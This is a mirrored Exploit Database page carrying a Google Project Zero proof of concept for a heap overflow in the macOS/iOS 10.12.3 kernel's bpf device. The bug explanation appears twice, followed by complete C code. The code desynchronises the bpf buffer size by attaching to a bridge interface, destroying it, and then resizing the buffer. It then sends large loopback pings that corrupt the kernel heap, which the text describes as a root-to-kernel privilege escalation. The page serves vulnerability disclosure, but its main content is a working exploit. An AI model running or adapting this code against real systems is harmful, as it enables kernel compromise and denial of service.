Apple macOS/iOS Kernel 10.12.3 (16D32) – ‘bpf’ Heap Overflow

• Exploit Database
• 114 阅读

• 作者： Google Security Research
  日期： 2017-04-04
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/41796/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167

  /* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1125   The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:   case BIOCSBLEN: /* u_int */ if (d->bd_bif != 0) error = EINVAL; else { u_int size;   bcopy(addr, &size, sizeof (size));   if (size > bpf_maxbufsize) size = bpf_maxbufsize; else if (size < BPF_MINBUFSIZE) size = BPF_MINBUFSIZE; bcopy(&size, addr, sizeof (size)); d->bd_bufsize = size; } break;     d->bd_bif is set to the currently attached interface, so we can&apos;t change the length if we&apos;re already attached to an interface.   There&apos;s no ioctl command to detach us from an interface, but we can just destroy the interface (by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger length which will set d->bd_bufsize to a new, larger value.   If we then attach to an interface again we hit this code in bpf_setif:   if (d->bd_sbuf == 0) { error = bpf_allocbufs(d); if (error != 0) return (error);   This means that the buffers actually won&apos;t be reallocated since d->bd_sbuf will still point to the old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size leading to heap corruption when packets are receive on the target interface.   This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our bpf device.)   We then set a large buffer size and attach to the loopback interface and sent some large ping packets.   This bug is a root -> kernel priv esc   tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 */   //ianbeer #if 0 MacOS/iOS kernel heap overflow in bpf   The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:   case BIOCSBLEN: /* u_int */ if (d->bd_bif != 0) error = EINVAL; else { u_int size;   bcopy(addr, &size, sizeof (size));   if (size > bpf_maxbufsize) size = bpf_maxbufsize; else if (size < BPF_MINBUFSIZE) size = BPF_MINBUFSIZE; bcopy(&size, addr, sizeof (size)); d->bd_bufsize = size; } break;     d->bd_bif is set to the currently attached interface, so we can&apos;t change the length if we&apos;re already attached to an interface.   There&apos;s no ioctl command to detach us from an interface, but we can just destroy the interface (by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger length which will set d->bd_bufsize to a new, larger value.   If we then attach to an interface again we hit this code in bpf_setif:   if (d->bd_sbuf == 0) { error = bpf_allocbufs(d); if (error != 0) return (error);   This means that the buffers actually won&apos;t be reallocated since d->bd_sbuf will still point to the old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size leading to heap corruption when packets are receive on the target interface.   This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our bpf device.)   We then set a large buffer size and attach to the loopback interface and sent some large ping packets.   This bug is a root -> kernel priv esc   tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 #endif   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <net/bpf.h> #include <net/if.h> #include <sys/socket.h> #include <sys/ioctl.h>   int main(int argc, char** argv) { int fd = open("/dev/bpf3", O_RDWR); if (fd == -1) { perror("failed to open bpf device\n"); exit(EXIT_FAILURE); }   // first set a small length: int len = 64; int err = ioctl(fd, BIOCSBLEN, &len); if (err == -1) { perror("setting small buffer length"); exit(EXIT_FAILURE); }   // create an interface which we can destroy later: system("ifconfig bridge7 create");   // connect the bpf device to that interface, allocating the buffer struct ifreq ifr; strcpy(ifr.ifr_name, "bridge7"); err = ioctl(fd, BIOCSETIF, &ifr); if (err == -1) { perror("attaching to interface"); exit(EXIT_FAILURE); }   // remove that interface, detaching us: system("ifconfig bridge7 destroy");   // set a large buffer size: len = 4096; err = ioctl(fd, BIOCSBLEN, &len); if (err == -1) { perror("setting large buffer length"); exit(EXIT_FAILURE); }   // connect to a legit interface with traffic: strcpy(ifr.ifr_name, "lo0"); err = ioctl(fd, BIOCSETIF, &ifr); if (err == -1) { perror("attaching to interface"); exit(EXIT_FAILURE); }   // wait for a packet... system("ping localhost -s 1400");   return 0; }